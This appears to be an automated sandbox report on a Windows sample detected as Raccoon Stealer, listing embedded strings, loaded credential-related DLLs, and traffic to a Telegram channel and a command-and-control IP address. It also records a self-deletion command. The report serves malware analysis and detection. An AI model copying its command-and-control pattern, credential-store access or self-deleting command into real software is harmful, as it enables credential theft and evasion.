Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qipcap.dll.0.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.0.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.0.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.0.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: eLZzxG56uH.exe, 00000000.00000003.302859980.0000000001746000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp, eLZzxG56uH.exe, 00000000.00000002.314058859.000000000168A000.00000004.00000020.sdmp String found in binary or memory: https://t.me/tika31ramencomp
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.0.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: qipcap.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.p
Source: eLZzxG56uH.exe, 00000000.00000003.311406485.000000004C73A000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: eLZzxG56uH.exe, 00000000.00000002.314150226.00000000016EC000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: eLZzxG56uH.exe, 00000000.00000003.302783596.000000000176D000.00000004.00000001.sdmp, RYwTiizs2t.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: unknown DNS traffic detected: queries for: t.me
Source: global traffic HTTP traffic detected: GET /tika31ramencomp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/21cbbf099c71cc43b2b903c1329c99a4ee8b02a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/-pEuK3wB3dP17SpzG6pB/7320aabda7ae3fb6c8f203b55593b70ca4e3db6f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: eLZzxG56uH.exe, 00000000.00000002.314058859.000000000168A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.eLZzxG56uH.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eLZzxG56uH.exe PID: 3340, type: MEMORYSTR

System Summary:

PE file contains section with special chars
Source: eLZzxG56uH.exe Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe Static PE information: section name: Intel Co
Uses 32bit PE files
Source: eLZzxG56uH.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F7819 0_2_001F7819
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001E10B1 0_2_001E10B1
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F628C 0_2_001F628C
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001EA2F9 0_2_001EA2F9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001FE2E4 0_2_001FE2E4
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001F73C6 0_2_001F73C6
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001DFD36 0_2_001DFD36
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001E06DD 0_2_001E06DD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001DE014 0_2_001DE014
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021D011 0_2_0021D011
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001DE857 0_2_001DE857
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001D78B7 0_2_001D78B7
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0020D298 0_2_0020D298
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001DEBE9 0_2_001DEBE9
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_002084BA 0_2_002084BA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021A4BD 0_2_0021A4BD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0020A480 0_2_0020A480
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0020D4CA 0_2_0020D4CA
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001E2D2B 0_2_001E2D2B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021A5DD 0_2_0021A5DD
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_00221E42 0_2_00221E42
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001EAE7B 0_2_001EAE7B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0021DF29 0_2_0021DF29
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_0020D72F 0_2_0020D72F
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001D8F0B 0_2_001D8F0B
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001DD704 0_2_001DD704
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001FD757 0_2_001FD757
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: String function: 00227790 appears 125 times
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: String function: 0020F0F9 appears 75 times
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: String function: 00200940 appears 32 times
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001FF3BE: DeviceIoControl,GetLastError, 0_2_001FF3BE
PE file does not import any functions
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: eLZzxG56uH.exe, 00000000.00000002.317170645.000000006EBFB000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs eLZzxG56uH.exe
Source: eLZzxG56uH.exe, 00000000.00000002.316712860.000000006EAC2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs eLZzxG56uH.exe
PE file contains strange resources
Source: eLZzxG56uH.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Section loaded: ondemandconnroutehelper.dll
PE file contains more sections than normal
Source: sqlite3.dll.0.dr Static PE information: Number of sections : 18 > 10
Source: eLZzxG56uH.exe Virustotal: Detection: 23%
Source: eLZzxG56uH.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\eLZzxG56uH.exe 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/68@1/2
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Code function: 0_2_001EA224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 0_2_001EA224
Source: softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, sqlite3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.0.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3460:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Command line argument: nq" 0_2_002270C0
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\eLZzxG56uH.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\eLZzxG56uH.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
Source: eLZzxG56uH.exe Static file information: File size 4704768 > 1048576
Source: eLZzxG56uH.exe Static PE information: Raw size of Intel Co is bigger than: 0x100000 < 0x43a000
Source: eLZzxG56uH.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
